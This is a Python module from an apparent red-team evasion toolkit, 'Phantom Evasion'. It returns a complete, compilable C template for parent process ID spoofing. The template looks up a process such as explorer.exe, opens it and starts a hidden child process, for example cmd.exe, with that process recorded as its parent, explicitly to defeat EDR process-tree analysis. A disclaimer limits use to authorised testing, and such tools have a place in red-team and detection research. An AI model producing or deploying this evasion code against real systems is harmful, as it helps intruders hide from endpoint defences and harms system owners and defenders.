"""
Phantom Evasion - Parent Process ID (PPID) Spoofing

LEGAL DISCLAIMER:
For authorized penetration testing and security research ONLY.
Users must have explicit written permission from the target system owner.
"""

from typing import Dict, Any


def generate_parent_spoof() -> Dict[str, Any]:
    """Generate C code to spoof the parent process ID of a newly created process.

    PPID spoofing uses the ``PROC_THREAD_ATTRIBUTE_PARENT_PROCESS`` extended
    process attribute to make the operating system record a chosen process
    (e.g., ``explorer.exe``) as the parent of a newly spawned child process.
    This misleads EDR process-tree analysis.

    Returns:
        Dict with keys ``code``, ``description``, ``layer``, ``name``.
    """
    code = r"""\
// PPID Spoofing – generated by Phantom Evasion
// Layer 4 – Behavioral Evasion
// Creates a child process whose recorded parent PID is the chosen spoof target.

#ifndef PHANTOM_PARENT_SPOOF_INCLUDED
#define PHANTOM_PARENT_SPOOF_INCLUDED

#include <windows.h>
#include <tlhelp32.h>

/**
 * Return the PID of the first running process matching *proc_name*,
 * or 0 if not found.
 */
static DWORD find_pid_by_name(const char *proc_name) {
    HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnap == INVALID_HANDLE_VALUE) return 0;

    PROCESSENTRY32 pe = { .dwSize = sizeof(pe) };
    DWORD pid = 0;

    if (Process32First(hSnap, &pe)) {
        do {
            if (_stricmp(pe.szExeFile, proc_name) == 0) {
                pid = pe.th32ProcessID;
                break;
            }
        } while (Process32Next(hSnap, &pe));
    }
    CloseHandle(hSnap);
    return pid;
}

/**
 * Spawn *child_exe* with its recorded parent set to *spoof_parent_name*.
 *
 * @param spoof_parent_name  e.g. "explorer.exe"
 * @param child_exe          Command line to execute, e.g. L"cmd.exe"
 */
static BOOL spawn_with_spoofed_parent(const char *spoof_parent_name,
                                       const wchar_t *child_exe) {
    DWORD spoof_pid = find_pid_by_name(spoof_parent_name);
    if (!spoof_pid) return FALSE;

    HANDLE hParent = OpenProcess(PROCESS_CREATE_PROCESS, FALSE, spoof_pid);
    if (!hParent) return FALSE;

    // Build an extended attribute list with the parent override
    SIZE_T attr_size = 0;
    InitializeProcThreadAttributeList(NULL, 1, 0, &attr_size);

    LPPROC_THREAD_ATTRIBUTE_LIST attr_list =
        (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(
            GetProcessHeap(), HEAP_ZERO_MEMORY, attr_size);
    if (!attr_list) {
        CloseHandle(hParent);
        return FALSE;
    }

    if (!InitializeProcThreadAttributeList(attr_list, 1, 0, &attr_size)) {
        HeapFree(GetProcessHeap(), 0, attr_list);
        CloseHandle(hParent);
        return FALSE;
    }

    UpdateProcThreadAttribute(attr_list, 0,
                              PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
                              &hParent, sizeof(hParent), NULL, NULL);

    STARTUPINFOEXW si = {0};
    si.StartupInfo.cb = sizeof(si);
    si.lpAttributeList = attr_list;

    PROCESS_INFORMATION pi = {0};
    BOOL ok = CreateProcessW(NULL, (LPWSTR)child_exe, NULL, NULL, FALSE,
                              EXTENDED_STARTUPINFO_PRESENT | CREATE_NO_WINDOW,
                              NULL, NULL,
                              (LPSTARTUPINFOW)&si, &pi);

    DeleteProcThreadAttributeList(attr_list);
    HeapFree(GetProcessHeap(), 0, attr_list);
    CloseHandle(hParent);

    if (ok) {
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }
    return ok;
}

#endif /* PHANTOM_PARENT_SPOOF_INCLUDED */
"""

    return {
        "code": code,
        "description": "PPID spoofing via PROC_THREAD_ATTRIBUTE_PARENT_PROCESS",
        "layer": "Layer 4 - Behavioral Evasion",
        "name": "parent_spoof",
    }
